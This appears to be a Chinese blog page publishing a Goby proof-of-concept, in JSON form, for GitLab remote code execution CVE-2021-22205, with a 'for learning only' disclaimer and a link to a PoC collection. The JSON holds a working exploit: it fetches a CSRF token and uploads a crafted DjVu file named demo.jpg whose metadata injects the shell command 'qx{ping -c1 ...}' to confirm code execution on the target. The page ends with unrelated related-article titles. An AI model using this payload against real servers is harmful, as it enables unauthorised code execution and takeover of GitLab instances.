Gitlab RCE CVE-2021-22205
Gitlab RCE CVE-2021-22205
- 声明
- 代码
- poc集合
声明
本程序仅供于学习交流,请使用者遵守《中华人民共和国网络安全法》,勿将此脚本用于非授权的测试,脚本开发者不负任何连带法律责任。
代码
{"Name": "Gitlab RCE CVE-2021-22205","Level": "3","Tags": ["rce"],"GobyQuery": "app=gitlab | title=\"gitlab\"","Description": "An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution","Product": "gitlab","Homepage": "https://about.gitlab.com/","Author": "aetkrad","Impact": "","Recommendation": "","References": ["http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=CVE-2021-22205"],"HasExp": true,"ExpParams": null,"ExpTips": {"Type": "","Content": ""},"ScanSteps": ["AND",{"Request": {"method": "GET","uri": "/users/sign_in","follow_redirect": true,"header": null,"data_type": "text","data": "","set_variable": []},"ResponseTest": {"type": "group","operation": "AND","checks": [{"type": "item","variable": "$code","operation": "==","value": "200","bz": ""},{"type": "item","variable": "$head","operation": "contains","value": "experimentation_subject_id","bz": ""}]},"SetVariable": ["X-CSRF-Token|lastbody|regex|name=\\\"csrf-token\\\" content=\\\"([\\s\\S]+?)\\\" />","output|lastbody|text|"]},{"Request": {"method": "POST","uri": "/uploads/user","follow_redirect": false,"header": {"X-CSRF-Token": "{{{X-CSRF-Token}}}","Content-Type": "multipart/form-data; boundary=---------------------------99652559321225150602861519786","X-Requested-With": "XMLHttpRequest"},"data_type": "text","data": "-----------------------------99652559321225150602861519786\nContent-Disposition: form-data; name=\"file\"; filename=\"demo.jpg\"\nContent-Type: image/jpeg\n\nAT&TFORM\u0000\u0000\u0000tDJVUINFO\u0000\u0000\u0000\n\u0000\u0000\u0000\u0000\u0018\u0000,\u0001\u0016\u0001BGjp\u0000\u0000\u0000\u0000ANTa\u0000\u0000\u0000N(metadata\n\t(Copyright \"\\\n\" . qx{ping -c1 {{{check}}} } . \\\n\" b \") )\n\n-----------------------------99652559321225150602861519786--\n","set_variable": []},"ResponseTest": {"type": "group","operation": "AND","checks": [{"type": "item","variable": "$code","operation": "==","value": "422","bz": ""},{"type": "item","variable": "$body","operation": "contains","value": "Failed to process image","bz": ""}]},"SetVariable": ["output|lastbody||"]}],"ExploitSteps": ["AND",{"Request": {"method": "GET","uri": "/test.php","follow_redirect": true,"header": null,"data_type": "text","data": "","set_variable": []},"ResponseTest": {"type": "group","operation": "AND","checks": [{"type": "item","variable": "$code","operation": "==","value": "200","bz": ""},{"type": "item","variable": "$body","operation": "contains","value": "test","bz": ""}]},"SetVariable": ["output|lastbody|regex|"]}],"PostTime": "2021-11-04 16:35:47","GobyVersion": "1.8.302"
}
poc集合
地址:https://github.com/aetkrad/goby_poc
帮助到你的话给个星吧!
Gitlab RCE CVE-2021-22205相关推荐
- 热门开源后端软件Parse Server中存在严重的 RCE ,CVSS评分10分
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 专栏·供应链安全 数字化时代,软件无处不在.软件如同社会中的"虚拟人",已经成为支撑社会正常运转的最基本元素之一,软件的安全 ...
- WebLogic CVE-2021-2394 RCE 漏洞分析
漏洞简述 2021年3月15日墨云安全V-Lab实验室向Oracle官方报告了Weblogic Server RCE漏洞,2021年7月21日Oracle发布了致谢信息. 这是一个二次反序列化漏洞,是 ...
- 小米实现隔空充电技术;程序员离职小技巧;GitLab 涨价|开发者周刊
整理 | 梦依丹 出品 | CSDN(ID:CSDNnews) CSDN开发者周刊:只为传递"有趣/有用"的开发者内容! 本周热门项目 0.从 4 美元涨到 19 美元,GitLa ...
- 速修复!这个严重的 Apache Struts RCE 漏洞补丁不完整
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士团队 专栏·供应链安全 数字化时代,软件无处不在.软件如同社会中的"虚拟人",已经成为支撑社会正常运转的最基本元素之一,软件的 ...
- 2021年年度最优质开源软件
Svelte Svelte 是一种全新的构建用户界面的方法.传统框架如 React 和 Vue 在浏览器中需要做大量的工作,而 Svelte 将这些工作放到构建应用程序的编译阶段来处理. 与使用虚拟( ...
- 2021 年年度最佳开源软件
Svelte https://svelte.dev/ Svelte 是一种全新的构建用户界面的方法.传统框架如 React 和 Vue 在浏览器中需要做大量的工作,而 Svelte 将这些工作放到构建 ...
- gitlab漏洞导致服务器被植入挖矿程序
记一次安全告警事件的处理 服务器上gitlab又被利用来挖矿 挖矿程序xmrig: 在蜜罐社区,安全威胁情报周报(21.11.13~21.11.19)看到捕获的gitlab漏洞GitLab rce ( ...
- 使用Go开发的数字书架应用 | Gopher Daily (2021.07.05) ʕ◔ϖ◔ʔ
每日一谚:API consumers: if it is not part of the contract, don't depend on it. Go技术生态 Myreads:一个使用Go.Rea ...
- 2021 HW 漏洞清单汇总 ( 附 poc )
2021 HW 漏洞清单汇总 2021.4.8--4.22 披露时间 涉及商家/产品 漏洞描述 2021/04/08 启明星辰天清汉马USG防火墙存在逻辑缺 ...
最新文章
- 关于大数据的完整讲解
- ElasticSearch-安装以及常见错误(自己测试过yum install -y log4j* )
- 分布式锁的几种实现原理
- linq中给字段添加别名
- DBShop电子商务系统
- 内部文件检索——公司经验管理系统的一种有效方法
- 创建线程方式2-runnable接口的实现类
- excel制作录入和查询系统_Excel进销存管理系统,完整函数应用,出入查询库存更新自动显示...
- 滴滴辞退2000人启示:牛逼的人,都有自己的铁饭碗
- A69G-HDMI问题解决集锦
- yy直播接口php,api.php · yyboss/phpcms - Gitee.com
- PDFlib-6.0.3p1-Windows] license key 算法分析
- vue+cordova 实现第三方登录( QQ 微信 微博)之微博登录
- iOS解决“The ‘Pods-XXX‘ target has transitive dependencies that include statically linked binaries”报错
- 计算机图形学实验——二维卡通人物交互
- C语言键盘方向键的读入
- 送书 | 知乎阅读300w+的生信学习指南(更新版)
- python异步协程实战:wallhaven壁纸网站
- iOS第三方工程加固
- 如何处理网站被植入恶意的一些代码导致的被机房拦截提示